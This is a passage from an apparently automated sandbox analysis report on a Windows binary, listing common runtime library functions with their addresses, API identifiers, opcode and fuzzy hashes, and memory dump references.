                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6FE0AD50B,?,?,00000000,00007FF6FE0AD5B3,?,?,?,?,?,?,00007FF6FE09AF6A), ref: 00007FF6FE0AD648
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1687624791-0
                                                                                                                                                                        • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction ID: bfecb26525c51aa14bc7e99a15110adf160fe0ea80c242a717ff1e22e7d638ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                        • Instruction Fuzzy Hash: BA118411F0964701EF945774D49037D2E92AFE4BA8F180335FA3EC72D6EE6CA4648600
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE07D400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3548387204-0
                                                                                                                                                                        • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction ID: c436e945a590a47500e27cd26212d84c0b81e6c7206e1d8d7475a3d080f8007f
                                                                                                                                                                        • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B116654E5810B42FB5477B094562BC1E919FF2B50F440634F57DEA2C3FD1CB8A58222
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE05F080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction ID: 07bd784016d6a77c7c1538441b598ab60570ce5fa9e0bc450648b74a25aa8faf
                                                                                                                                                                        • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6511A832A08B4586DB208B59E4843297BB4F7E8758F544231E6AE836E4EF3DD565CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFE2DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        • Opcode ID: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                        • Instruction ID: a64ea66f7feb74a8abc3f5145b5ca68f283ca0f759fb3ab92c3523466dc69ae0
                                                                                                                                                                        • Opcode Fuzzy Hash: 85b01fc9dd2385e696d620e118b477d8565d40a877a840c79710b35754001cda
                                                                                                                                                                        • Instruction Fuzzy Hash: 2071FB36619B8586CB60DB19E49076EB7A0F7C8BA4F104125EA9DC7BA8EE38D451CB00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE004C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2882679554-0
                                                                                                                                                                        • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction ID: fe1bf42dbbee3002bcdba78e6f981232ec5d5e369026a2efacfdf47a620109ec
                                                                                                                                                                        • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                        • Instruction Fuzzy Hash: AE51BB76618B4982DB60DF1AE49012E7BB1F7D9B94F101232EB9D87BA8DF3CD4518B04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFEDFF0 Relevance: 1.6, APIs: 1, Instructions: 102stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction ID: 150ea7fdc55fdb182282313052b3a894e30985dc82eb10c9843b266f61f70688
                                                                                                                                                                        • Opcode Fuzzy Hash: 89b1068a0023759cda3ceb920f6e8c1857f0eae96593cfe7be954dcf565d8c29
                                                                                                                                                                        • Instruction Fuzzy Hash: 6051CB36619B8886DB60CB4AE49031EBBA0F7C8B94F144225EADD47BA8DF7DD544CF40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0AE0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction ID: e7a11c2123221a590903fe2e8d4cb2b61375c0e01a38e5cf401e626242554677
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                        • Instruction Fuzzy Hash: DD318F32A1865A85E7016F65CC4137C3EA1AFE4BA0F510235F93D833D6EF7CA4A28712
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0B1698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction ID: ff3ec5ef1b308683df46ba61e41d4a2e25936886d0cc1b7b906424a536752c4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F218732E18A4287D7619F28D4407797AA1FBE4B98F584235F66DC76D9EF3DD8208B00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09AC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                        • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction ID: 76e81f45094e7c0c5707826dca0d6bd7eab1fa1c35fc13645b0cfa96d83f577e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C214C72E05B418AEB158F64C4442EC3BB0EB9471CF54493AE66D87BC9EF38D5A5CB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09B114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction ID: fd18136c2537c20a95c4abffa0c552f06597709848314a6ee964d1205ebb4c92
                                                                                                                                                                        • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction Fuzzy Hash: 84117222A1C68A45FB719F55D4003BDAA60AFE5B94F544031FA7C87BCEEF2DD9608B04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09B3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction ID: 0aa4f332c309774badaaa8e809299c2b6a4e48657d78a0ca6d40b4e96baead2c
                                                                                                                                                                        • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1501AC21A0878940EB00DF52980107DAA90BFE5FE0B088631FE7C87BDAEE3CD0218700
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFDACA0 Relevance: 1.5, APIs: 1, Instructions: 42stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction ID: 00d9bca6545747f39f40152bb1b1af6e7cadd684548b5123a8274944573f9c41
                                                                                                                                                                        • Opcode Fuzzy Hash: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F11D6329086868BE720DB15E04442EB7A2F7D5755F100235EB9C87BA8EF3DE940CF48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0AD534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction ID: fc880f039c162fe4e0938bbe3fd1acbac68028cfbcfca27af10bbc52c1d6da1d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A11947291864A85E705AF64D4402AC7F60EBE0B68F904136F66D863D9EF7CE060CB10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09AF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                                                                                                                                        • Instruction ID: 8b4f8c6e81491e40e8f4b1243941e64bf9bb7414f9c30d42055e2714247de675
                                                                                                                                                                        • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
